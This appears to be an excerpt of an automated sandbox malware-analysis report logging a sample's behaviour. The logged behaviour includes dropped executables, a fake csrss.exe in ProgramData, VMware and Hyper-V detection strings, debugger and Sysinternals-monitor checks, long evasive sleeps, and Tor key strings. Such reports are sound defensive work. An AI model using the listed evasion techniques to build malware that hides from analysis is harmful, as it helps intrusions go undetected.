                                Source: C:\Users\user\AppData\Local\Temp\B013.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 423Jump to behavior
                                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1370Jump to behavior
                                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 518Jump to behavior
                                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 419Jump to behavior
                                Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 677Jump to behavior
                                Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 693Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeWindow / User API: threadDelayed 3326
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeWindow / User API: threadDelayed 6117
                                Source: C:\ProgramData\Drivers\csrss.exeWindow / User API: threadDelayed 5539
                                Source: C:\ProgramData\Drivers\csrss.exeWindow / User API: threadDelayed 4995
                                Source: C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exeWindow / User API: threadDelayed 2688
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\bin\x86\is-BN6BT.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\bin\x86\7z.exe (copy)Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\bin\x86\is-82753.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\bin\x86\is-LB4R5.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\bin\x86\takdec.exe (copy)Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\bin\x86\is-T6JRC.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\bin\x86\is-4ENN3.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI64322\unicodedata.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\bin\x86\is-5N34J.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\bin\x86\is-O8J8D.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\bin\x86\is-AHKA2.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\bin\x86\is-6NO5U.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\bin\x86\is-M77GN.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\bin\x86\opusenc.exe (copy)Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\bin\x86\is-N5RMT.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\bin\x86\is-NPP07.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\bin\x86\is-LN8F3.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-LECMG.tmp\_isetup\_setup64.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\bin\x86\is-9EJD1.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-LECMG.tmp\_isetup\_RegDLL.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\bin\x86\is-CA7HB.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\bin\x86\is-SK9ML.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\is-M5V0E.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\bin\x86\mp3gain.exe (copy)Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\bin\x86\is-M5NA9.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\bin\x86\is-CV65T.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\bin\x86\is-40QD3.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\unins000.exe (copy)Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\bin\x86\is-AUP01.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\bin\x86\is-95FJN.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\bin\x86\is-061H5.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\bin\x86\is-B8UB5.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\bin\x86\pcm2dsd.exe (copy)Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\bin\x86\is-NJ5T1.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\bin\x86\is-N5KRR.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\bin\x86\is-ARAOP.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\bin\x86\is-PK59T.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\bin\x86\is-M3SQC.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\bin\x86\is-8N3DM.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\bin\x86\plugins\internal\is-HJRAJ.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\bin\x86\is-HI55A.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\bin\x86\is-3KPO5.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\bin\x86\is-JNRFN.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\bin\x86\is-8RC7G.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\bin\x86\is-U6T88.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\bin\x86\is-CJH5R.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\bin\x86\is-GR4AC.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\bin\x86\is-5KQFU.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\bin\x86\is-QG5TG.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\bin\x86\plugins\internal\is-139BC.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\bin\x86\is-ULAJR.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\bin\x86\is-V43EJ.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\bin\x86\is-OURMN.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\bin\x86\is-7D04O.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\bin\x86\is-FNH7L.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\bin\x86\is-RL3ER.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpDropped PE file which has not been started: C:\Program Files (x86)\SplitControlVB\bin\x86\is-MSK3G.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_12-22698
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_12-22778
                                Source: C:\Windows\explorer.exe TID: 2108Thread sleep time: -137000s >= -30000sJump to behavior
                                Source: C:\Windows\explorer.exe TID: 1780Thread sleep time: -51800s >= -30000sJump to behavior
                                Source: C:\Windows\explorer.exe TID: 7144Thread sleep time: -30500s >= -30000sJump to behavior
                                Source: C:\Windows\explorer.exe TID: 2108Thread sleep time: -41900s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8F78.exe TID: 404Thread sleep time: -30000s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\B013.exe TID: 2148Thread sleep time: -27670116110564310s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exe TID: 6184Thread sleep time: -30000s >= -30000s
                                Source: C:\ProgramData\Drivers\csrss.exe TID: 4456Thread sleep count: 5539 > 30
                                Source: C:\ProgramData\Drivers\csrss.exe TID: 4456Thread sleep time: -553900s >= -30000s
                                Source: C:\ProgramData\Drivers\csrss.exe TID: 664Thread sleep count: 4995 > 30
                                Source: C:\ProgramData\Drivers\csrss.exe TID: 664Thread sleep time: -499500s >= -30000s
                                Source: C:\Windows\SysWOW64\explorer.exe TID: 2008Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe TID: 6448Thread sleep count: 2688 > 30
                                Source: C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe TID: 6448Thread sleep time: -5376000s >= -30000s
                                Source: C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe TID: 25480Thread sleep count: 67 > 30
                                Source: C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe TID: 25480Thread sleep time: -4020000s >= -30000s
                                Source: C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe TID: 25480Thread sleep time: -60000s >= -30000s
                                Source: C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exeFile opened: PhysicalDrive0
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                                Source: C:\Users\user\AppData\Local\Temp\E36B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\ProgramData\Drivers\csrss.exeLast function: Thread delayed
                                Source: C:\ProgramData\Drivers\csrss.exeLast function: Thread delayed
                                Source: C:\ProgramData\Drivers\csrss.exeLast function: Thread delayed
                                Source: C:\ProgramData\Drivers\csrss.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exeLast function: Thread delayed
                                Source: C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exeLast function: Thread delayed
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeCode function: 8_2_00007FF6E1B509E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,8_2_00007FF6E1B509E4
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeCode function: 8_2_00007FF6E1B46744 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,8_2_00007FF6E1B46744
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeCode function: 8_2_00007FF6E1B37850 FindFirstFileExW,FindClose,8_2_00007FF6E1B37850
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeCode function: 8_2_00007FF6E1B46744 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,8_2_00007FF6E1B46744
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exeThread delayed: delay time: 60000
                                Source: C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exeThread delayed: delay time: 60000
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeFile opened: C:\Users\user\AppData\Local\Temp\_MEI64322\tcl\
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeFile opened: C:\Users\user\AppData\Local\Temp\
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeFile opened: C:\Users\user\AppData\Local\
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeFile opened: C:\Users\user\AppData\Local\Temp\_MEI64322\
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeFile opened: C:\Users\user\AppData\
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeFile opened: C:\Users\user\
                                Source: explorer.exe, 00000001.00000000.1701298478.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                                Source: 8F78.exe, 00000007.00000003.2233461698.00000000033AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MIGJAoGBALTKLm+Dn2//Wdsm4wVkqC6KdyxM64ihWRVmcinNdv7gngpzrQ45dqJm
                                Source: explorer.exe, 00000001.00000000.1700756289.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
                                Source: explorer.exe, 00000001.00000000.1699278229.00000000078A0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
                                Source: explorer.exe, 00000001.00000000.1701298478.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                                Source: explorer.exe, 00000001.00000000.1697424437.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
                                Source: 8F78.exe, 00000007.00000003.2261087199.00000000033B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MIGJAoGBANR5BdXVbpdMX3Ob1V3BfuQemU8uU69NjLB2JC4zlLSJaVSbQRjWJMEV
                                Source: explorer.exe, 00000001.00000000.1701298478.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                                Source: explorer.exe, 00000001.00000000.1699278229.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
                                Source: 8F78.exe, 00000007.00000002.3546933816.00000000008C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllP
                                Source: explorer.exe, 00000001.00000000.1700756289.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
                                Source: explorer.exe, 00000001.00000000.1700756289.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1700756289.000000000982D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: 8F78.exe, 00000007.00000003.2151953970.00000000033A9000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3794710882.0000000004429000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ntor-onion-key zeABkSC5U36c9jPkbqVUzrjd6qt+/Rti3yHGfsRtYhY
                                Source: 8F78.exe, 00000007.00000002.3656574531.00000000039A0000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000003.2311756360.00000000033C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MIGJAoGBAJtcCCBEuPXqEMu2rREZdSYB+1TY6HE/BWrbN1/ZfMwxUulfEocqfD/3
                                Source: explorer.exe, 00000001.00000000.1701298478.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                                Source: 8F78.exe, 00000007.00000003.2292751971.00000000033C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MIGJAoGBAMZvmci/v9lu2mS+O/M3cUaAMvMrIOsTCKVWdgTHvKYn6UHCdNCgnztj
                                Source: explorer.exe, 00000001.00000000.1699278229.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
                                Source: explorer.exe, 00000001.00000000.1697424437.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                                Source: explorer.exe, 00000001.00000000.1700756289.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
                                Source: 8F78.exe, 00000007.00000003.2233461698.00000000033AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: id ed25519 5uD7nVmCI5DppHHtx2H+7AzbTP39/UvAQinqkc/a/lg
                                Source: explorer.exe, 00000001.00000000.1697424437.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeAPI call chain: ExitProcess graph end nodegraph_12-22585
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeAPI call chain: ExitProcess graph end nodegraph_12-22968
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeAPI call chain: ExitProcess graph end nodegraph_12-22659
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeAPI call chain: ExitProcess graph end nodegraph_12-22504
                                Source: C:\Users\user\Desktop\ZRgv8wdMtR.exeSystem information queried: ModuleInformationJump to behavior
                                Source: C:\Users\user\Desktop\ZRgv8wdMtR.exeProcess information queried: ProcessInformationJump to behavior

                                Anti Debugging

                                barindex
                                Source: C:\Users\user\Desktop\ZRgv8wdMtR.exeSystem information queried: CodeIntegrityInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\wesswwiSystem information queried: CodeIntegrityInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\CA06.exeSystem information queried: CodeIntegrityInformation
                                Source: C:\Users\user\AppData\Roaming\gwsswwiSystem information queried: CodeIntegrityInformation
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeThread information set: HideFromDebugger
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeOpen window title or class name: regmonclass
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeOpen window title or class name: gbdyllo
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeOpen window title or class name: procmon_window_class
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeOpen window title or class name: ollydbg
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeOpen window title or class name: filemonclass
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                                Source: C:\Users\user\Desktop\ZRgv8wdMtR.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Roaming\wesswwiProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeProcess queried: DebugObjectHandle
                                Source: C:\Users\user\AppData\Local\Temp\CA06.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Roaming\gwsswwiProcess queried: DebugPort
                                Source: C:\Users\user\Desktop\ZRgv8wdMtR.exeCode function: 0_2_004029BA LdrLoadDll,0_2_004029BA
                                Source: C:\Users\user\AppData\Local\Temp\8F78.exeCode function: 7_2_006943E0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_006943E0
                                Source: C:\Users\user\AppData\Local\Temp\8F78.exeCode function: 7_2_0069D030 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,7_2_0069D030
                                Source: C:\Users\user\Desktop\ZRgv8wdMtR.exeCode function: 0_2_0096FCC3 push dword ptr fs:[00000030h]0_2_0096FCC3
                                Source: C:\Users\user\Desktop\ZRgv8wdMtR.exeCode function: 0_2_0248092B mov eax, dword ptr fs:[00000030h]0_2_0248092B
                                Source: C:\Users\user\Desktop\ZRgv8wdMtR.exeCode function: 0_2_02480D90 mov eax, dword ptr fs:[00000030h]0_2_02480D90
                                Source: C:\Users\user\AppData\Roaming\wesswwiCode function: 3_2_00900D90 mov eax, dword ptr fs:[00000030h]3_2_00900D90
                                Source: C:\Users\user\AppData\Roaming\wesswwiCode function: 3_2_0090092B mov eax, dword ptr fs:[00000030h]3_2_0090092B
                                Source: C:\Users\user\AppData\Roaming\wesswwiCode function: 3_2_00A6E5A3 push dword ptr fs:[00000030h]3_2_00A6E5A3
                                Source: C:\Users\user\AppData\Local\Temp\8F78.exeCode function: 6_2_026CE0A3 push dword ptr fs:[00000030h]6_2_026CE0A3
                                Source: C:\Users\user\AppData\Local\Temp\8F78.exeCode function: 6_2_02890042 push dword ptr fs:[00000030h]6_2_02890042
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_00401450 mov edx, dword ptr fs:[00000030h]12_2_00401450
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_00625255 mov eax, dword ptr fs:[00000030h]12_2_00625255
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_00615420 mov eax, dword ptr fs:[00000030h]12_2_00615420
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_0061B57B mov eax, dword ptr fs:[00000030h]12_2_0061B57B
                                Source: C:\ProgramData\Drivers\csrss.exeCode function: 14_2_02C00083 push dword ptr fs:[00000030h]14_2_02C00083
                                Source: C:\ProgramData\Drivers\csrss.exeCode function: 14_2_02E00042 push dword ptr fs:[00000030h]14_2_02E00042
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeCode function: 8_2_00007FF6E1B525D0 GetProcessHeap,8_2_00007FF6E1B525D0
                                Source: C:\Users\user\AppData\Local\Temp\8F78.exeCode function: 7_2_006943E0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_006943E0
                                Source: C:\Users\user\AppData\Local\Temp\8F78.exeCode function: 7_2_00694A78 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00694A78
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeCode function: 8_2_00007FF6E1B49B14 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00007FF6E1B49B14
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeCode function: 8_2_00007FF6E1B3B6CC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00007FF6E1B3B6CC
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeCode function: 8_2_00007FF6E1B3AE30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00007FF6E1B3AE30
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeCode function: 8_2_00007FF6E1B3B8B0 SetUnhandledExceptionFilter,8_2_00007FF6E1B3B8B0
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_004080B3 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_004080B3
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_00407F4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00407F4E
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_004041C7 SetUnhandledExceptionFilter,12_2_004041C7
